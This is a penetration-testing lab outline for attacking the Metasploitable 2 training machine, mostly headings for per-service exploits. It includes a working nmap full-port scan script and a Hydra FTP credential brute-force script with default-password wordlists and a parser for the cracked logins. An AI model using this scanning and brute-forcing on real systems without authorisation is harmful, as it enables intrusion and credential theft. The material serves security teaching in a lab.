
Lab 5: Exploiting Network Vulnerabilities with Metasploit


1. Preparation

2. Some Metasploit concepts

3. Gathering information about the target machine

3.1 Use netdiscover to detect the target IP address

3.2 Run nmap to detect open ports and running services on the target machine.

3.3 Network Scan
The first step is a service scan of all 65535 TCP ports of Metasploitable 2, so that we know what is
running on which port and in which version. The result is shown in the screenshot below.
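As an added example (this script is not part of the lab handout), the full-range version scan described above, followed by a small helper that reduces nmap's grepable output to one "port/proto service version" line per open port. That list is what the per-service sections in part 4 work through. The target address is an assumption; replace it with what netdiscover reported in 3.1. The sample scan output embedded below is constructed so the parser can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example, not the lab's own script. Full-range service scan of the
# Metasploitable 2 box, plus a parser for the grepable (-oG) result.
# TARGET is an assumed address: set it to the host found with netdiscover.

TARGET="${TARGET:-192.168.56.101}"

# -p- covers all 65535 TCP ports, -sV fingerprints the listening service and
# its version, -oG writes the grepable format that open_ports_from_gnmap reads.
scan_target() {
    nmap -p- -sV -T4 -oG scan.gnmap "$1"
}

# Reduce the "Ports:" host line of a .gnmap file (stdin) to one line per open port:
#   port/proto service version
# Grepable port entries look like 21/open/tcp//ftp//vsftpd 2.3.4/ with the fields
# port/state/proto/owner/service/rpcinfo/version; nmap writes "|" instead of "/"
# inside the version column, so splitting on "/" is safe.
open_ports_from_gnmap() {
    grep 'Ports:' \
        | sed -e 's/.*Ports: //' -e 's/[[:space:]]*Ignored State:.*//' \
        | tr ',' '\n' \
        | sed 's/^ *//' \
        | awk -F/ '$2 == "open" { printf "%s/%s %s %s\n", $1, $3, $5, $7 }'
}

# Constructed sample of what nmap writes to scan.gnmap for this host (offline demo).
SAMPLE_GNMAP=$(printf '%s\t%s\n%s\t%s\t%s\n' \
    'Host: 192.168.56.101 ()' 'Status: Up' \
    'Host: 192.168.56.101 ()' \
    'Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 25/filtered/tcp//smtp///, 6667/open/tcp//irc//UnrealIRCd/' \
    'Ignored State: closed (65531)')

# Pass --scan to run the real scan; with no argument the constructed sample is parsed.
if [ "${1:-}" = "--scan" ]; then
    scan_target "$TARGET"
    open_ports_from_gnmap < scan.gnmap
else
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports_from_gnmap
fi
```

Filtered and closed ports are dropped on purpose: only the open ones get a section in part 4. Keep scan.gnmap, since the version column (vsftpd 2.3.4, UnrealIRCd, and so on) is what decides which Metasploit module to try later.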

4. Metasploit Toolkit for Penetration Testing

4.1 Exploiting Port 21: FTP


With all ports and services listed, we start with port 21, which runs FTP. We use Hydra to brute-force the
login with two wordlists, one of default user names and one of default passwords.
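As an added example (not the lab's own commands), the Hydra run against port 21 together with a helper that turns Hydra's result lines into user:pass pairs, which is the form later steps (for instance a USERPASS_FILE for a Metasploit login scanner) want. The target address is assumed, the two wordlists are constructed here because the lab only shows them as screenshots, and the Hydra output embedded below is constructed so the helper can be tested offline.

```shell
#!/usr/bin/env bash
# Added example, not the lab's own script: brute-force the FTP login with Hydra
# and collect the valid pairs. TARGET is an assumed address.

TARGET="${TARGET:-192.168.56.101}"

# Constructed default-credential wordlists standing in for the lab's screenshots.
make_wordlists() {
    printf '%s\n' msfadmin user service postgres ftp > users.txt
    printf '%s\n' msfadmin user service postgres password 123456 > passwords.txt
}

# -L and -P take the user and password lists, -t 4 keeps the parallel sessions
# low enough that vsftpd does not start refusing connections, -o saves every hit.
ftp_bruteforce() {
    hydra -L users.txt -P passwords.txt -t 4 -o hydra_ftp.txt "ftp://$1"
}

# Hydra prints each valid pair as
#   [21][ftp] host: 192.168.56.101   login: msfadmin   password: msfadmin
# Reduce those lines (stdin) to "login:password", ignoring banner and status lines.
# Limitation: a password containing whitespace would be cut at the first space.
creds_from_hydra() {
    awk '/^\[[0-9]+\]\[ftp\] host:/ {
        for (i = 1; i <= NF; i++) {
            if ($i == "login:")    login = $(i + 1)
            if ($i == "password:") pass  = $(i + 1)
        }
        print login ":" pass
    }'
}

# Constructed Hydra output for the offline demo.
SAMPLE_HYDRA=$(printf '%s\n' \
    '[DATA] attacking ftp://192.168.56.101:21/' \
    '[21][ftp] host: 192.168.56.101   login: msfadmin   password: msfadmin' \
    '[21][ftp] host: 192.168.56.101   login: user   password: user' \
    '1 of 1 target successfully completed, 2 valid passwords found')

# Pass --attack to run Hydra for real; with no argument the sample output is parsed.
if [ "${1:-}" = "--attack" ]; then
    make_wordlists
    ftp_bruteforce "$TARGET"
    creds_from_hydra < hydra_ftp.txt
else
    printf '%s\n' "$SAMPLE_HYDRA" | creds_from_hydra
fi
```

Keep the thread count low against Metasploitable 2: vsftpd limits concurrent sessions, and a Hydra run that hammers it with the default 16 tasks produces connection errors that look like failed logins.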

4.2 Exploiting vsftpd 2.3.4

4.3 Exploiting Port 22 SSH

4.4 Bruteforce Port 22 SSH (RSA Method)

4.5 Exploiting port 23 TELNET (Credential Capture)

4.6 Exploiting TELNET

4.7 Port 25 SMTP User Enumeration

4.8 Twiki (port 80)

4.9 Exploiting Port 80 (PHP_CGI)

4.10 Exploiting Port 139 & 445 (Samba)

4.11 Exploiting Port 8080 (Java)

4.12 PostgreSQL (port 5432)

4.13 Exploiting Port 5432 (Postgres)

4.14 Exploiting Port 6667 (UnrealIRCd)

4.15 distccd (port 3632)

4.16 Exploiting Port 36255

4.17 Remote Login Exploitation

4.18 Remote Shell Exploitation

4.19 Exploiting Distributed Ruby Remote Code Execution (8787) - Ruby DRb RMI (port 8787)

4.20 Bindshell Exploitation

4.21 Exploiting Port 5900 (VNC)

4.22 Access Port 2121 (ProFTPD)

4.23 Exploiting Apache Tomcat


Use Nikto to scan the Tomcat server.

4.24 Exploiting Port 8180 (Apache Tomcat)

4.25 Privilege Escalation via Port 2049: NFS

4.26 Exploiting Port 3306 (MySQL)

Part 2:
Scanning for Network Services with Metasploit

Part 3: Gaining Root from a Vulnerable Service
